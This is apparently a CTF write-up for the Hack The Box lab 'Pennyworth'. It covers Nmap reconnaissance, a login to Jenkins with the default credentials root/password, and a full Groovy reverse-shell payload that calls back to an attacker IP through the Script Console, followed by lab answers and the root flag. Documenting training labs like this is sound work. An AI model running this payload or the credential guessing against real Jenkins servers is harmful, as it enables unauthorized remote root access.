Pennyworth (Tier 1)

Description

• Tier -> 1

• Difficult -> Very Easy

• OS -> Linux

• Tags -> Common Applications / Jenkins / Java / Reconnaissance / Remote Code Execution / Default Credentials

https://app.hackthebox.com/starting-point?tier=1

Write-up

• With a little research, I started answering the first questions

Answer: Common Vulnerabilities and Exposures

---

Answer: Confidentiality, Integrity, Availability

---

• Then I did an initial port scan using Nmap

nmap 10.129.197.177 -p- -Pn --min-rate 2500 -oN scan.txt

---

• I also did an exhaustive scan to get more information about the service running on the open port

nmap 10.129.197.177 -p8080 -sVC -oN serv_scan.txt

---

• With this, I answered the next question

Answer: Jetty 9.4.39.v20210325

---

• I found the service was using the HTTP protocol on port 8080, so I visited the content being deployed through the browser. There I found a Jenkins login page, and with a little research, I learned this is an automation server for web services

To learn more about the HTTP protocol you can go here

---

• I tried to log in with common credentials and after trying with the username root and the password password, I got in successfully to an administration dashboard. I explored the site and noticed that by scrolling down to the bottom the version of the Jenkins service was shown

snippet

---

• With this, I answered the next question

Answer: 2.289.1

---

• I searched for possible CVEs for this version of Jenkins but didn't find anything. So I explored the options of the dashboard and found that by scrolling down under the Manage Jenkins tab, there was an option named Script Console, and with some research, I learned that it let to interact internally with the server via a type of script called Groovy

snippet

snippet

snippet

---

• With this, I answered the next question

Answer: Groovy

---

• With this, I could search for more exploitation options under this service, being the objective to gain a shell from the target system. So, to find out possible payloads I looked for help on the Reverse Shell Cheat Sheet from the PayloadsAllTheThings repository. After exploring and testing some payloads for Groovy, we found one that worked, and let me gain a shell as the root user. After that, I sanitized the terminal to interact better with the system

RevShell.Groovy

String host="10.10.14.117";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}catch (Exception e){}};
p.destroy();
s.close();

To learn about the sanitization process you can go here

---

• With this and a little research, I answer the next questions

Answer: cmd.exe

---

Answer: ifconfig

---

Answer: -u

---

Answer: Reverse Shell

---

• Then, I went to the /root folder to see its contents and found a root.txt file, finally reading it to obtain the flag

---

• With this, I got the root flag and pwned the machine

Answer: 9cdfb439c7876e703e307864c9167a15